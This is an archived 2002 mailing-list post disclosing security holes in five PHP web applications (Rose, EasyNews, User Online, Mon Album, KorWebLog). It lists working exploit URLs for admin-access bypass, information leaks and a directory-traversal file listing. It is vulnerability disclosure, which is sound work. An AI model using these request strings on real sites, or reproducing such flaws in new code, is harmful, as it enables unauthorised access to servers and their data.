Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Security holes : Rose, EasyNews, User Online, Mon Album, KorWebLog

From: frog frog <leseulfrog () hotmail com>
Date: 6 Jun 2002 15:14:02 -0000


Hello people :)

Product 1 :
***********
Rose
http://www.jinxm.co.uk

Version :
4.52 

Problem :
- Admin access

Exploit :
- newsadmin/upload.php?userinfo[username]=hop&userinfo[userlevel]=100

Product 2 :
***********
EasyNews
http://www.webrc.ca

Version :
4.3

Problem :
- Admin access

Exploits :
- admin.php?en_log_id=0&action=users
- admin.php?en_log_id=0&action=config

Product 3 :
***********
User Online
http://www.elpar.net

Version :
2.0

Problem :
- Informations recovery

Exploit :
- /ip.txt

Product 4 :
***********
Mon Album
http://www.3dsrc.com

Version :
0.6.2d

Problems :
- Informations recovery
- Admin access

Exploits :
- admin/admin_phpinfo.php4
- admin.php4?reg_login=1

Product 5 :
***********
KorWebLog
http://weblog.kldp.org/
http://eunjea.sourceforge.net/

Version :
1.5.8

Problems :
- Path disclosure
- HD's files listing

Exploits :
- viewimg.php?path=viewimg.php&form=1&var=1
- viewimg.php?path=../../../path/to/list&form=1&var=1




More details in french :
http://www.ifrance.com/kitetoua/tuto/5holes7.txt

Translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
2Fkitetoua%2Ftuto%2F5holes7.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools


frog-m@n
Previous By Date Next
Previous By Thread Next

Current thread: